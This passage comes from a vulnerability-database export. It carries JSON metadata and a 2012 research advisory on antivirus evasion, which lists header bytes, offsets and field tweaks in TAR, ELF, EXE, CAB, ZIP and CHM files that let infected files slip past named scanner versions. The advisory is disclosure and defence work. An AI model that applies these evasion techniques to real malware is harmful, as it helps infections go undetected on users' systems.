"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1442"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1433"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1420"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1437"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54721"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52595"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"date": "2012-03-19T23:51:01",
"db": "PACKETSTORM",
"id": "110990"
},
{
"date": "2012-03-21T10:11:47.957000",
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54721"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52595"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"date": "2012-03-21T10:11:47.957000",
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products ELF Vulnerability to bypass malware detection in file parser",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
],
"trust": 0.6
}
}
VAR-201203-0370
Vulnerability from variot - Updated: 2023-12-18 12:10The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. Multiple products ELF A file parser contains a vulnerability that can prevent malware detection. Different ELF If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.Changed by a third party encoding With field ELF Malware detection may be avoided via files. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All affected products are command-line versions of the AVs.
Vulnerability Descriptions
- Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.
Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00
CVE no - CVE-2012-1419
- Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03
CVE no - CVE-2012-1420
- Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103
CVE no - CVE-2012-1421
- Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1422
- Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.
Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0
CVE no - CVE-2012-1423
- Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0
CVE no - CVE-2012-1424
- Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.
Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03
CVE no - CVE-2012-1426
- Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1427
- Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0
CVE no - CVE-2012-1428
- Specially crafted infected ELF files with "ustar" at offset 257 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01
CVE no - CVE-2012-1429 12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.
Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1430 13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03
CVE no - CVE-2012-1431
- Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.
Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1432
- Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1433
- Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1434
- Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1435
- Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.
Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7
CVE no - CVE-2012-1436
- Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.
Affected products - Comodo 7425
CVE no - CVE-2012-1437
- Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.
Affected products - Comodo 7425, Sophos 4.61.0
CVE no - CVE-2012-1438
- 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1439
- 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.
Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1440
- 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.
Affected products - Prevx 3.0
'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',
'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and
'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1
it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0
CVE no - CVE-2012-1441
- 'class' field in ELF files is parsed incorrectly.
If an infected ELF file's class field is incremented by 1 it evades detection. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.
Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0 nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2
CVE no - CVE-2012-1443
- 'abiversion' field in ELF files is parsed incorrectly.
If an infected ELF file's abiversion field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1444
- 'abi' field in ELF files is parsed incorrectly.
If an infected ELF file's abi field is incremented by 1 it evades detection.
Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1445
- 'e_version' field in ELF files is parsed incorrectly.
If an infected ELF file's e_version field is incremented by 1 it evades detection.
Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7
CVE no - CVE-2012-1447
- 'cbCabinet' field in CAB files is parsed incorrectly.
If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.
Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0 TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1
CVE no - CVE-2012-1448
- 'vMajor' field in CAB files is parsed incorrectly.
If an infected CAB file's vMajor field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1449
- 'reserved3' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1450
- 'reserved2' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved2 field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0
CVE no - CVE-2012-1451
- 'reserved1' field in CAB files is parsed incorrectly.
If an infected CAB file's reserved field is incremented by 1 it evades detection.
Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00
CVE no - CVE-2012-1452
- 'coffFiles' field in CAB files is parsed incorrectly.
If an infected CAB file's coffFiles field is incremented by 1 it evades detection. 'ei_version' field in ELF files is parsed incorrectly.
If an infected ELF file's version field is incremented by 1 it evades detection.
Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7
CVE no - CVE-2012-1454
- 'vMinor' field in CAB files is parsed incorrectly.
If an infected CAB file's version field is incremented by 1 it evades detection.
Affected products - NOD32 5795, Rising 22.83.00.03
CVE no - CVE-2012-1455
- A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.
Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0
CVE no - CVE-2012-1457
- A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.
If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.
Affected products - ClamAV 0.96.4, Sophos 4.61.0
CVE no - CVE-2012-1458
- In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.
If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.
Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2
CVE no - CVE-2012-1460
- GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes
Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103
CVE no - CVE-2012-1462
- In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.
Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7
CVE no - CVE-2012-1463
Credits
Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.
References
"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0370",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "avl sdk",
"scope": "eq",
"trust": 1.8,
"vendor": "antiy",
"version": "2.0.3.7"
},
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "pc tools",
"version": "7.0.3.5"
},
{
"model": "esafe",
"scope": "eq",
"trust": 1.8,
"vendor": "aladdin",
"version": "7.0.17.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "kaspersky",
"version": "7.0.0.125"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "sophos",
"version": "4.61.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "scan engine",
"scope": "eq",
"trust": 1.8,
"vendor": "mcafee",
"version": "5.400.0.1158"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "rising global",
"version": "22.83.00.03"
},
{
"model": "quick heal",
"scope": "eq",
"trust": 1.0,
"vendor": "cat",
"version": "11.00"
},
{
"model": "gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "endpoint protection",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "antivirus \\\u0026 antispyware",
"scope": "eq",
"trust": 1.0,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "rising",
"version": "22.83.00.03"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "norman",
"version": "6.06.12"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "heal",
"scope": "eq",
"trust": 0.8,
"vendor": "quick heal k k",
"version": "11.00"
},
{
"model": "endpoint protection",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "11"
},
{
"model": "web gateway software",
"scope": "eq",
"trust": 0.8,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "20101.3103"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "4.61"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "rising",
"version": "22.8303"
},
{
"model": "cat-quickheal",
"scope": "eq",
"trust": 0.3,
"vendor": "quick heal",
"version": "11.00"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "pctools",
"version": "7.0.35"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "norman",
"version": "6.6.12"
},
{
"model": "mcafee-gw-edition 2010.1c",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "7.0125"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
},
{
"model": "antiy-avl",
"scope": "eq",
"trust": 0.3,
"vendor": "antiy",
"version": "2.0.37"
}
],
"sources": [
{
"db": "BID",
"id": "52600"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:norman:norman_antivirus_\\\u0026_antispyware:6.06.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_vet_antivirus:36.1.8511:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1446"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52600"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1446",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-1446",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54727",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-1446",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-410",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54727",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001897"
},
{
"db": "NVD",
"id": "CVE-2012-1446"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-410"
}
